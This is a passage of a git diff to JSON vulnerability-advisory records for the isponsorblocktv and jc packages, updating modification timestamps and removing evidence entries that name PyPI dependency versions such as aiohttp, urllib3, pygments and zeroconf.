b/advisories/BREW-isponsorblocktv-CVE-2026-34515.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-34515", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-p998-jp59-783m", "CVE-2026-34515", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-34516.json b/advisories/BREW-isponsorblocktv-CVE-2026-34516.json index 0b1182b3f74..d3a02c2da19 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-34516.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-34516.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-34516", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-m5qp-6w8w-w647", "CVE-2026-34516", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-34517.json b/advisories/BREW-isponsorblocktv-CVE-2026-34517.json index f1899a387ca..87947188726 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-34517.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-34517.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-34517", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:52:51Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-3wq7-rqq7-wx6j", "CVE-2026-34517", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-34518.json b/advisories/BREW-isponsorblocktv-CVE-2026-34518.json index e8e5a7a2248..9db965d09d2 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-34518.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-34518.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-34518", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:52:51Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-966j-vmvw-g2g9", "CVE-2026-34518", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-34519.json b/advisories/BREW-isponsorblocktv-CVE-2026-34519.json index 4bd121547bd..05ff6986ace 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-34519.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-34519.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-34519", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-mwh4-6h8g-pg8w", "CVE-2026-34519", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-34520.json b/advisories/BREW-isponsorblocktv-CVE-2026-34520.json index d88411fb4e1..0362e0f0d33 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-34520.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-34520.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-34520", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:52:51Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-63hf-3vf5-4wqf", "CVE-2026-34520", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-34525.json b/advisories/BREW-isponsorblocktv-CVE-2026-34525.json index 2a8ba594d28..c05f1f6d5de 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-34525.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-34525.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-34525", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:52:51Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-c427-h43c-vf67", "CVE-2026-34525", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-34993.json b/advisories/BREW-isponsorblocktv-CVE-2026-34993.json index a67cbe52e8c..c2be4244cb7 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-34993.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-34993.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-34993", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-jg22-mg44-37j8", "CVE-2026-34993", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-44431.json b/advisories/BREW-isponsorblocktv-CVE-2026-44431.json index 2e632b888b8..feab0c59b01 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-44431.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-44431", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-44432.json b/advisories/BREW-isponsorblocktv-CVE-2026-44432.json index 2b8d9a7e575..a5dbc91bc02 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-44432.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-44432", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-4539.json b/advisories/BREW-isponsorblocktv-CVE-2026-4539.json index 93b4dcb2a65..5bf6e734064 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-4539.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-4539", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-45409.json b/advisories/BREW-isponsorblocktv-CVE-2026-45409.json index 06cb94ea218..50d97067c23 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-45409.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-45409", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-47180.json b/advisories/BREW-isponsorblocktv-CVE-2026-47180.json index 3264783c10d..b33db368061 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-47180.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-47180.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-47180", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-9pgc-3ccv-5297", "CVE-2026-47180", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "zeroconf", - "subject_version": "0.150.0", - "key": "pkg:pypi/zeroconf@0.150.0", - "resource": "zeroconf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-47183.json b/advisories/BREW-isponsorblocktv-CVE-2026-47183.json index 66b128b82ef..39401a91d53 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-47183.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-47183.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-47183", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-phvx-9mgw-67r5", "CVE-2026-47183", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "zeroconf", - "subject_version": "0.150.0", - "key": "pkg:pypi/zeroconf@0.150.0", - "resource": "zeroconf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-47184.json b/advisories/BREW-isponsorblocktv-CVE-2026-47184.json index d8d881a710a..3f69fccba08 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-47184.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-47184.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-47184", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-rfg2-pjw2-56x2", "CVE-2026-47184", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "zeroconf", - "subject_version": "0.150.0", - "key": "pkg:pypi/zeroconf@0.150.0", - "resource": "zeroconf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-47265.json b/advisories/BREW-isponsorblocktv-CVE-2026-47265.json index c704d947561..cb8ea8c6279 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-47265.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-47265.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-47265", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-hg6j-4rv6-33pg", "CVE-2026-47265", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-48045.json b/advisories/BREW-isponsorblocktv-CVE-2026-48045.json index 113b9244ddb..9aac46ff5a0 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-48045.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-48045.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-48045", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-9663-mqmp-p9mm", "CVE-2026-48045", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "zeroconf", - "subject_version": "0.150.0", - "key": "pkg:pypi/zeroconf@0.150.0", - "resource": "zeroconf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-48487.json b/advisories/BREW-isponsorblocktv-CVE-2026-48487.json index 2811a872160..4f7314f928a 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-48487.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-48487.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-48487", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-qc2x-6f54-m6h9", "CVE-2026-48487", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "zeroconf", - "subject_version": "0.150.0", - "key": "pkg:pypi/zeroconf@0.150.0", - "resource": "zeroconf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-50269.json b/advisories/BREW-isponsorblocktv-CVE-2026-50269.json index 0839608e7de..d0ed25013ed 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-50269.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-50269.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-50269", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-m6qw-4cw2-hm4m", "CVE-2026-50269", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-54273.json b/advisories/BREW-isponsorblocktv-CVE-2026-54273.json index a2b0eec8064..abd946f5401 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-54273.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-54273.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-54273", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:52:51Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-4fvr-rgm6-gqmc", "CVE-2026-54273", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-54274.json b/advisories/BREW-isponsorblocktv-CVE-2026-54274.json index b222e3f5725..9afc85cdffd 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-54274.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-54274.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-54274", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-xcgm-r5h9-7989", "CVE-2026-54274", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-54275.json b/advisories/BREW-isponsorblocktv-CVE-2026-54275.json index 9d4d1ed8997..8df24be070f 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-54275.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-54275.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-54275", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:52:51Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-4m7w-qmgq-4wj5", "CVE-2026-54275", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-54276.json b/advisories/BREW-isponsorblocktv-CVE-2026-54276.json index 8f7fceaa20a..6667b28798b 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-54276.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-54276.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-54276", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-hpj7-wq8m-9hgp", "CVE-2026-54276", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-54277.json b/advisories/BREW-isponsorblocktv-CVE-2026-54277.json index 68fca9c90e0..d1d14c77549 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-54277.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-54277.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-54277", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:52:51Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-63hw-fmq6-xxg2", "CVE-2026-54277", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-54278.json b/advisories/BREW-isponsorblocktv-CVE-2026-54278.json index e87499a2ccd..0b688b4fd40 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-54278.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-54278.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-54278", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-g3cq-j2xw-wf74", "CVE-2026-54278", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-54279.json b/advisories/BREW-isponsorblocktv-CVE-2026-54279.json index 00173a05db3..4500b6ee3fd 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-54279.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-54279.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-54279", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:52:51Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-2fqr-mr3j-6wp8", "CVE-2026-54279", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-54280.json b/advisories/BREW-isponsorblocktv-CVE-2026-54280.json index 1875d4ec7da..daae9059933 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-54280.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-54280.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-54280", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:52:51Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-9x8q-7h8h-wcw9", "CVE-2026-54280", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-59881.json b/advisories/BREW-isponsorblocktv-CVE-2026-59881.json index fe2a877808b..767b8ba996a 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-59881.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-59881.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-59881", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-mq44-7p77-q5h7", "CVE-2026-59881", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-69243.json b/advisories/BREW-isponsorblocktv-CVE-2026-69243.json index f2fcd7ea04e..0e523b0f8c0 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-69243.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-69243.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-69243", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-mfx4-hv73-q22v", "CVE-2026-69243", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-69244.json b/advisories/BREW-isponsorblocktv-CVE-2026-69244.json index 23f2be6bb71..be655542792 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-69244.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-69244.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-69244", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-cq5v-8q36-5273", "CVE-2026-69244", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-jc-CVE-2015-8557.json b/advisories/BREW-jc-CVE-2015-8557.json index a951b919f1b..e6d8629f772 100644 --- a/advisories/BREW-jc-CVE-2015-8557.json +++ b/advisories/BREW-jc-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-jc-CVE-2015-8557", "published": "2026-08-13T17:00:09Z", - "modified": "2026-08-13T17:00:09Z", + "modified": "2026-09-10T19:33:04Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-jc-CVE-2021-20270.json b/advisories/BREW-jc-CVE-2021-20270.json index 5431fb73df6..426d8b1d0b1 100644 --- a/advisories/BREW-jc-CVE-2021-20270.json +++ b/advisories/BREW-jc-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-jc-CVE-2021-20270", "published": "2026-08-13T17:00:09Z", - "modified": "2026-08-13T17:00:09Z", + "modified": "2026-09-10T19:33:04Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-jc-CVE-2021-27291.json b/advisories/BREW-jc-CVE-2021-27291.json index 8e394cd315e..76c758953e2 100644 --- a/advisories/BREW-jc-CVE-2021-27291.json +++ b/advisories/BREW-jc-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-jc-CVE-2021-27291", "published": "2026-08-13T17:00:09Z", - "modified": "2026-08-13T17:00:09Z", + "modified": "2026-09-10T19:33:04Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { 